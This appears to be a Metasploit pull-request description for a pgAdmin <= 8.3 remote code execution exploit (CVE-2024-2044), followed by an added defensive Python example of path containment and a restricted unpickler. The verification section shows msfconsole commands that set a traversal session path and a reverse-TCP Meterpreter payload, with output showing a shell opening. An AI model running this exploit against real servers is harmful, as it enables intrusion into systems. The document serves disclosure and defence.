metasploit-framework
Add exploit for CVE-2024-2044 (pgAdmin <= 8.3 RCE)
This adds an exploit for pgAdmin <= 8.3 which is a path traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized. This also adds a new Python deserialization gadget chain to execute the code in a new thread so the target application doesn't block the HTTP request. I've added the source code for both the new one and the original as well to help future travelers tweak it as necessary.
Important notes from the exploit description:
This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials are specified. If valid credentials are provided, Metasploit will log in to pgAdmin and upload a payload object using pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before being deleted using the file management plugin. This technique works for both Linux and Windows targets. If no credentials are provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a UNC path. This technique only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also requires that insecure outbound guest access be enabled.
Tested on pgAdmin 8.3 on Linux, 7.7 on Linux, 7.0 on Linux, and 8.3 on Windows. The file management plugin underwent changes in the 6.x versions and therefore pgAdmin versions < 7.0 cannot utilize the authenticated technique whereby a payload is uploaded.
This requires the changes from:
- rapid7/ruby_smb#264
Verification

- [ ] Install the application
- [ ] Start msfconsole
- [ ] Do: `use exploit/multi/http/pgadmin_session_deserialization`
- [ ] Set the `RHOST`, `PAYLOAD`, and optionally the `USERNAME` and `PASSWORD` options
- [ ] Do: `run`
```
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RHOSTS 192.168.250.134
RHOSTS => 192.168.250.134
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RPORT 8080
RPORT => 8080
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set USERNAME [email protected]
USERNAME => [email protected]
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > run
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Triggering deserialization for path: ../storage/user_gmail.com/eos.json
[*] Sending stage (24768 bytes) to 192.168.250.134
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.134:45930) at 2024-03-29 12:01:04 -0400
meterpreter > getuid
Server username: pgadmin
meterpreter > sysinfo
Computer : 27b165126272
OS : Linux 6.7.9-200.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Mar 6 19:35:04 UTC 2024
Architecture : x64
Meterpreter : python/linux
meterpreter > pwd
/pgadmin4
meterpreter >
```
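The PR summary describes a two-part chain: a client-controlled session identifier is joined onto a storage path without containment checks (the run above shows `../storage/user_gmail.com/eos.json` being accepted), and the file it lands on is handed to `pickle`, whose global references turn into arbitrary callables. The following is an added defensive example, not code from the PR, from pgAdmin, or from Metasploit, showing the two controls an application loading session state from disk needs: strict path containment (which also rejects the UNC-style paths used by the unauthenticated technique) and an allowlisting `Unpickler` that refuses to resolve any global not explicitly permitted. The storage root, the allowlist, the session blobs and the identifiers are all constructed for the demo and are not pgAdmin's real layout or class names.

```python
import builtins
import io
import pickle
from pathlib import Path
from typing import Optional, Tuple

# Hypothetical session-storage root; pgAdmin's actual layout is not taken from the PR.
SESSION_ROOT = Path("/tmp/pgadmin_sessions_demo")

# Allowlist of the only globals a session pickle may reference. Session state is
# assumed here to be plain dicts/strings/numbers; anything else (functions, or
# classes from os, subprocess, threading, ...) is refused before it can be
# instantiated or called.
ALLOWED_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "str"),
    ("builtins", "int"),
}


def resolve_session_path(root: Path, session_id: str) -> Optional[Path]:
    """Map a client-supplied session identifier to a file strictly inside `root`.

    Returns None for anything that could escape: empty or padded ids, '.' / '..',
    and any slash or backslash (which also rules out UNC-style \\\\host\\share
    paths and nested directories).
    """
    if not session_id or session_id != session_id.strip():
        return None
    if "/" in session_id or "\\" in session_id or session_id in (".", ".."):
        return None
    root_resolved = root.resolve()
    candidate = (root_resolved / session_id).resolve()
    # Belt and braces: even after the character filter, require containment.
    try:
        candidate.relative_to(root_resolved)
    except ValueError:
        return None
    if candidate == root_resolved:
        return None
    return candidate


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves allowlisted globals.

    Every GLOBAL / STACK_GLOBAL opcode goes through find_class, so refusing here
    means the deserializer never obtains a callable it could later invoke,
    regardless of which gadget chain the blob carries.
    """

    def find_class(self, module: str, name: str):
        if (module, name) in ALLOWED_GLOBALS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"refusing to resolve global {module}.{name}")


def safe_loads(raw: bytes):
    """Deserialize `raw` with the restricted unpickler; raises on disallowed globals."""
    return RestrictedUnpickler(io.BytesIO(raw)).load()


def check_session(session_id: str, raw: bytes, root: Path = SESSION_ROOT) -> Tuple[str, object]:
    """Apply both controls in order and report which one (if any) rejected the input."""
    path = resolve_session_path(root, session_id)
    if path is None:
        return ("rejected-path", session_id)
    try:
        data = safe_loads(raw)
    except pickle.UnpicklingError as exc:
        return ("rejected-pickle", str(exc))
    return ("ok", data)


# Constructed samples: a benign session blob, and one whose only content is a
# reference to a global (`len`, harmless by itself) so the refusal path is exercised.
BENIGN_SESSION = pickle.dumps({"user": "alice", "logins": 3})
GLOBAL_REF_SESSION = pickle.dumps(len)

if __name__ == "__main__":
    for sid, blob in [
        ("3f9c1a", BENIGN_SESSION),
        ("3f9c1a", GLOBAL_REF_SESSION),
        ("../storage/user_gmail.com/eos.json", BENIGN_SESSION),  # traversal value from the PR's run output
        (r"\\10.0.0.5\share\session", BENIGN_SESSION),           # constructed UNC-style identifier
    ]:
        print(f"{sid!r} -> {check_session(sid, blob)}")
```

The order matters: the path check runs first so that a hostile identifier never causes a read at all, and the unpickler check is what protects a deployment where the storage directory is writable by another route (the authenticated technique in the PR uploads the blob through a legitimate file-management feature, so containment alone would not have stopped it).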